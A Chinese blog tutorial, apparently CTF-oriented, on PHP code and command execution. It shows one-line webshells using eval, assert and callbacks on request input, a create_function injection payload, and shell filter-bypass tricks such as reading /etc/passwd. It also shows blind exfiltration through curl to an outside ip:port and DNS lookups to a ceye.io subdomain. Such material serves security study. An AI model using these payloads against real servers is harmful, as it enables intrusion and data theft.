assert 之后 不执行_聊一聊代码、命令执行

最新推荐文章于 2023-08-10 21:29:04 发布
最新推荐文章于 2023-08-10 21:29:04 发布
阅读量730 收藏 2
点赞数
CC 4.0 BY-SA版权
文章标签: assert 之后 不执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_39804523/article/details/112127923
本文探讨了PHP中的代码执行,包括eval、assert、call_user_func等方法的使用及示例,以及命令执行的相关概念、常见函数如system、exec等。还介绍了多种绕过策略,如分隔符、空格、敏感字符绕过,并提到了无回显情况下的解决方案。最后,文章提到命令执行长度限制和无字母数字命令执行的技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

谁让我写不出鲨鱼大佬那种内网的文章,只好写写这种基础文章来划划水喽....

726d68bdc676b6475670921c5686bdaf.png

代码执行

代码执行概念

远程代码执行实际上是调用服务器网站代码进行执行。

常见执行方法

eval

eval():将字符串当做函数进行执行(需要传入一个完整的语句)

demo:

<?php eval('echo "hello";');?>

执行后就会输出一个hello

assert

assert():判断是否为字符串,是则当成代码执行

demo:

低版本:

<?php assert($_POST['a']);?>

php官方在php7中更改了assert函数。在php7.0.29之后的版本不支持动态调用。

7.0之后的demo

<?php $a = 'assert';$a(phpinfo());?>

call_user_func

call_user_func():回调函数,可以使用is_callable查看是否可以进行调用

demo:

<?php highlight_file(__FILE__);$a = 'system';$b = 'pwd';call_user_func($a,$b);call_user_func('eval','phpinfo()');?>

其中基本可以传递任何内置的和用户自定义的函数, 除了语言结构:array、echo、empty、eval...

call_user_fuc_array

call_user_fuc_array():回调函数,参数为数组

demo:

<?php highlight_file(__FILE__);$array[0] = $_POST['a'];call_user_func_array("assert",$array); ?>

create_function

create_function():创建匿名函数

string create_function(string $args,string $code)

args是要创建的函数的参数,code是函数内的代码

demo:

<?php highlight_file(__FILE__);$a = create_function('$code', 'echo $code');$b = 'hello';$a($b);$a = 'phpinfo();';$b = create_function(" ", $a);$b();?>

preg_replace

preg_replace():当为/e时代码会执行,前提是不超过php7

demo:

<?php highlight_file(__FILE__);$a = 'phpinfo()';$b = preg_replace("/abc/e", $a, 'abc');?>

array_map

array_map():为数组的每个元素应用回调函数

demo:

<?php highlight_file(__FILE__);$a = $_GET['a'];$b = $_GET['b'];$array[0] = $b;$c = array_map($a,$array);?>

用法:/?a=assert&b=phpinfo();

array_filter

array_filter():依次将 array 数组中的每个值传递到 callback 函数。如果 callback 函数返回 true,则 array 数组的当前值会被包含在返回的结果数组中。数组的键名保留不变。

demo:

<?php highlight_file(__FILE__);$array[0] = $_GET['a'];array_filter($array,'assert');?>

usort

usort():使用自定义函数对数组进行排序

demo:

<?php highlight_file(__FILE__);usort(...$_GET);#usort($_GET[1],'assert');?>

...$GET是php5.6引入的新特性。即将数组展开成参数的形式

用法:

1[]=phpinfo()&1[]=123&2[]=assert

大致过程:

大概过程就是,GET变量被展开成两个参数['phpinfo', '123']和assert,传入usort函数。usort函数的第二个参数是一个回调函数assert,其调用了第一个参数中的phpinfo();

uasort

uasort():使用用户自定义的比较函数对数组的值进行排序并保持索引关联

demo:

<?php highlight_file(__FILE__);$e = 'assert';$arr = array($_REQUEST['pass'],'test' );uasort($arr, $e);?>

${}

${}:中间的php代码将会被解析

demo:

<?php highlight_file(__FILE__);${phpinfo()};?>

d0050c02714c91e042fb8d4b273506b1.png

代码执行例题

题目:

<?php highlight_file(__FILE__);$price = $_GET['price'];$code = 'echo $name.'.'的价格是'.$price.';';$b = create_function('$name', $code);$b('iphone');?>

代码逻辑很清楚,调用b这个匿名函数,参数为iphone。

在整个过程中,我们能够控制的只有name的值,我们把这个函数b拆开来看就变成了下面这样:

function b($name){ echo $name.'.'的价格是'.$price;}

所以最后构造payload为:123;}phpinfo();/*

那么传入后代码就会变成下面这样

function b($name){ echo $name.     }phpinfo();/*'.'的价格是'.$price;}

命令执行

命令执行概念

通过易受攻击的应用在主机上执行任意命令。

命令执行常见函数

system

system:可以执行系统命令并将其输出

demo:

<?php highlight_file(__FILE__);system('pwd');system('whoami');?>

exec

exec:执行命令,但无输出,可以使用output进行输出

demo:

<?php highlight_file(__FILE__);exec('pwd',$b);var_dump($b);?>

passthru

passthru:执行命令并输出

demo:

<?php highlight_file(__FILE__);passthru('ls');?>

shell_exec

shell_exec:执行命令,但无回显

demo:

<?php highlight_file(__FILE__);var_dump(shell_exec('ls'));?>

反引号

反引号:执行shell命令,并返回输出的字符串

demo:

<?php highlight_file(__FILE__);$a = 'pwd';echo `$a`;?>

ob_start

ob_start:打开输出控制缓冲

demo:

<?php highlight_file(__FILE__);ob_start("system");echo "whoami";ob_end_flush();?>

绕过

262be1cffca728cebd07b6c61e5a5aed.png

常见分隔符

•换行符 %0a•回车符 %0d•连续指令 ;•后台进程 &•管道符 |•逻辑 || &&

绕过空格

•$IFS•<•${IFS}•$IFS$9•%09

各类符号

即使用”substr string pos len“的方法进行取字符

demo:

echo "${PATH:0:1}"echo "`expr$IFS\substr\$IFS\$(pwd)\$IFS\1\$IFS\1`"echo `$(expr${IFS}substr${IFS}$PWD${IFS}1${IFS}1)`expr${IFS}substr${IFS}$SESSION_MANAGER${IFS}6${IFS}1

•%0a•%0d•%00•%20

敏感字符绕过

变量绕过

a=l,b=s;$a$b

base64编码绕过

echo 'cat' | base64

未定义的初始化变量

cat$b /etc/passwd

连接符

cat /etc/pass’w’d

使用通配符:

如:

/???/?s --help

题目地址:http://moectf.cn:10012/

payload:/?cmd=eval($_GET[%27a%27]);&a=system(ls);

无回显

150e3dbc38b8d39526cbac7fc2532c90.png

1、使用延时函数,比如:ls|sleep 3 2、使用http,比如:ls|curl ip:port 3、使用dns

demo:

<?php highlight_file(__FILE__);include("where_flag.php");echo "ping";$ip = (string)$_GET['ping'];$ip = str_replace(">", "0.0", $ip);shell_exec("ping".$ip);?>

思路1:使用cp命令将where_flag.php改名,然后下载得到flag

如:127.0.0.1;cp where_is_flag.php 1.txt

思路二:dnslog外带

因为dnslog不能带有空格,所以使用sed去空格

最后的payload:

/?ping=cat where_flag.php|sed s/[[:space:]]//.php.xxxx.ceye.io

因为ceye无法处理换行,所以我们可以使用下面的方法处理换行问题

ping=127.0.0.1 -c 1;for i in `cat where_is_flag.php`;do ping $i.xxx.ceye.io;done;

注意:只能在curl下有效

长度绕过

如15位命令执行、7位命令执行、5位命令执行、4位命令执行

具体参考:https://xz.aliyun.com/t/1579

无字母数字命令执行(webshell)

1、异或

因为每个字符的本质是ascii码值,而ascii可以变成二进制,二进制进行xor后再转换,就是字母

2、取反

其实同理,将字符转换为二进制后取反

3、自增

具体可查看:

https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html https://www.php.net/manual/zh/language.operators.increment.php

f24989e9b4ff0a2297038ff79f76b115.png

写在后面

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽

1d825c26054b50a9d9d9b9d6d9e050db.png

RCE:代码执行命令执行
qq_68163788的博客
05-30 1594
RCE是种严重的安全漏洞,允许攻击者通过远程方式执行恶意代码或命令在受感染的系统上。这种漏洞可以被利用来获取系统权限、窃取敏感数据、篡改网站内容或者在受感染系统上植入后门,从而使攻击者能够完全控制受感染系统。RCE的危害性极高,因为攻击者可以利用这种漏洞对系统进行广泛的破坏,甚至扩大攻击范围至整个网络。 RCE漏洞通常存在于网络应用程序、操作系统或者其他软件中,攻击者可以通过各种方式发现和利用这些漏洞。
WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
最新发布
weixin_45534587的博客
02-09 962
RCE,全称 Remote Code Execution,也就是远程代码执行。简单来说,它是种非常危险的安全漏洞。正常情况下,我们访问个网站或者使用某个应用程序,只能按照开发者设定好的功能来操作。但要是存在 RCE 漏洞,攻击者就能打破这种限制,在目标服务器上执行他们自己编写的代码
ubuntu php 无法执行exec_代码命令执行
weixin_39710179的博客
11-21 254
谁让我写出鲨鱼大佬那种内网的文章,只好写写这种基础文章来划划水喽....代码执行代码执行概念远程代码执行实际上是调用服务器网站代码进行执行。常见执行方法evaleval():将字符串当做函数进行执行(需要传入个完整的语句)demo:...
ubuntu php 无法执行exec_命令执行
weixin_39961636的博客
12-08 756
、php命令执行常用的几个,shell_exec('whoami')可以简写为`whoami`,popen完全回显。以下几个经常被disable_functions禁用
ubuntu php 无法执行exec_利用webhook使php项目自动部署
weixin_39640024的博客
11-27 140
php中文网最新课程每日17点准时技术干货分享1.先来讲下自动部署的原理,般在我们push代码的时候,可以自动请求webhook中设置的url,完成次请求与响应。那么只要我们设置的url地址请求的php文件内容是执行命令行git push命令,则可以实现每次在本地push推送代码到远端,服务器就会自动git pull拉取最新的分支。2.那么我们需要设置的就是两个地方:①git项...
ubuntu php 无法执行exec_从道CTF题目谈PHP中的命令执行
weixin_39756696的博客
11-23 262
原创 Xenny 合天智汇 快睡的时候,打开B站发现有位用户留言,大意就是让我帮忙看道题,正好当时有空,于是就打开了他发的链接,代码如下很明显是道PHP代码审计的题目,而且只需要绕过第三行的if即可进行任意命令执行。解决思路看了代码之后觉得是道普通的题目,对于/a-zA-Z/这个正则表达式,我们可以利用PHP动态函数的特性,构造出字符串即可。对于想要的字符串,我们可以通过以下三种方式来构造:1...
ubuntu php 无法执行exec_PHP安全:系统命令注入
weixin_39556811的博客
12-06 224
次性付费进群,长期免费索取教程,没有付费教程。进微信群回复公众号:微信群;QQ群:460500587教程列表见微信公众号底部菜单 |本文底部有推荐书籍微信公众号:计算机与网络安全ID:Computer-network系统命令注入攻击(OS Command Injection)是指恶意攻击者通过非正常手段提交shell命令,通过PHP函数进行系统调用执行,以达到恶意攻击系统的...
test-assert.rar_games_test assert
09-24
当`assert()`的条件为假(即表达式结果为0)时,它会打印条错误消息并终止程序执行。 在游戏开发中,测试断言是确保游戏逻辑正确的重要手段。例如,可能会用断言来检查玩家的生命值是否在允许的范围内,或者游戏...
Java代码执行shell命令的实现
08-25
"Java代码执行shell命令的实现" Java代码执行shell命令的实现是指在Java程序中调用操作系统的shell命令,实现与操作系统交互的功能。下面将详细介绍Java代码执行shell命令的实现方法。 环境准备 在执行shell命令...
在PHP中执行系统外部命令
01-21
但事情总是如此,有时为了实现某个功能,必须借助于操作系统的外部程序(或者称之为命令),这样可以做到事半功倍。 那么,是否可以在PHP脚本中调用外部命令呢?如果能,如何去做呢?有些什么方面的顾虑呢?相信你...
assert-callback:个简单的库,允许您利用回调在异步函数中使用断言
07-13
断言回调 个插入式替换库,允许您在异步函数中使用断言,利用回调来处理错误。 API 奇偶校验 [X] ... assert(value, [message]) [X] ... assert.ok(value, [message]) [X] ... assert.equal(actual, expected, [message]) [X] ... assert.notEqual(actual, expected, [message]) [X] ... assert.deepEqual(actual, expected, [message]) [X] ... assert.notDeepEqual(actual, expected, [message]) [X] ... assert.strictEqual(actual, expected, [message]) [X] ..
android平台使用assert断言
bsxylj的专栏
04-18 4434
android assert
动态调用函数时的命令执行对于eval()和assert()的执行问题
Alexhirchi的博客
07-02 3912
前言 在做道通过反序列化后动态调用函数的题目时,最后获取flag使用assert和phpinfo() 构成的命令可以执行 但eval和phpinfo()无法执行 ,本来以为只是因为assert可以把字符串参数当php代码执行,而eval是只能对合法的php代码可以执行的问题的原因,但这解释总感觉怪怪的,后来查询了些文档并进行本地测试发现其另有原因。 附上题目中的主要代码: class HelloPhp { public $a; public $b; public func
Wine应用兼容性指南:解决常见的应用程序问题
weixin_43908694的博客
08-10 4239
Wine是个强大的工具,可以在Ubuntu上运行许多Windows应用程序。尽管它在提供访问Windows应用程序方面非常强大,但并是所有应用程序都能在Wine中无缝运行。在本篇文章中,我们将提供些解决常见应用程序兼容性问题的实用指南,帮助您更好地使用Wine在Ubuntu中运行应用程序。
php无法运行外部命令,php无法调用外部命令时的处理方法
weixin_33196555的博客
03-20 657
在php中,调用外部命令的函数有少,常见的有: system()passthru()escapeshellcmd()pcntl_exec()exec()有时,会遇到在php脚本中添加了命令,例:exec("rm -rf /a/b/c/*.html");却始终执行。问题:问题在于c文件的权限,设置的高了就没有问题了。问题二:php的安全模式。PHP 脚本中受到如下四个方面的限制: 由于 PH...
php无法运行外部命令,php 执行系统外部命令的方法详解
weixin_33447647的博客
03-20 803
在php编程中,用于执行系统外部命令的方法有很多,这里看下它们的区别:system() 输出并返回最后行shell结果。exec() 输出结果,返回最后行shell结果,所有结果可以保存到个返回的数组里面。passthru() 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上。相同点:都可以获得命令执行的状态码。例如:复制代码 代码示例://system('dir');// ex...
怎么清理php注入,PHP注入攻击 – 如何最好地清理混乱?
weixin_42400970的博客
04-01 141
段时间,我的共享托管环境受到威胁,因为我没有保持我安装的应用程序的投资组合.上周,这是因为个旧的和未使用的安装了个名为Help Center Live的PHP应用程序.结果是,服务器上的每个PHP文件(并且我有几个Wordpresses,Joomlas,SilverStripe安装)都添加了代码,从其他站点拉出隐藏的链接,并将它们包含在我的页面中.其他人在这种攻击之后报告他们的网站被禁止...
php实现sed命令
zuihoudebingwen的专栏
08-22 1412
//$retu = system("cat test | grep '\.$'| sed 's/\.$/\!/g'",$out); $retu = system("sed -i 's/^aaa/bbb/g' man"); print_r($retu); //print_r($out); ?> //把aaa开头的每行中把aaa替换为bbb
assert函数执行命令
01-10
### Python `assert` 语句详解 #### 断言语句的基础结构 在Python编程中,`assert` 是种用于调试目的的关键字。其基本语法为: ```python assert condition, "Optional error message" ``` 这里,`condition` 表达式会被求值;如果它为真,则触发 `AssertionError` 异常并可选附带条消息[^1]。 #### 使用场景举例 下面的例子展示了如何利用 `assert` 来验证输入参数的有效性: ```python def divide(a, b): assert b != 0, "除数能为零" # 如果b等于0则抛出错误 return a / b ``` 这段代码确保了分母是零的情况发生前就阻止了潜在的运行时错误[^4]。 #### 性能考虑下的行为变化 值得注意的是,在启用优化模式下(即通过 `-O` 参数启动脚本),所有包含 `assert` 的检查都会被忽略掉,这有助于提升最终部署版本的应用性能[^2]。 #### 实际应用案例 假设有个函数用来计算两个正整数之和,并希望确保传入的确实是正值: ```python def add_positive_numbers(x, y): """仅当x和y都是大于零的时候才返回它们相加的结果""" assert isinstance(x, int), "第个参数必须是整型数值" assert isinstance(y, int), "第二个参数必须是整型数值" assert x > 0 and y > 0, "两者的值都应该是正数" result = x + y print(f"{x} 加上 {y} 得到的结果是: ", end="") return result print(add_positive_numbers(5, 7)) try: print(add_positive_numbers(-3, 8)) # 这里会引发 AssertionError 错误 except AssertionError as e: print(e) ``` 上述示例仅检验了数据类型的正确性还确认了业务逻辑上的约束条件——只处理正整数之间的运算操作[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值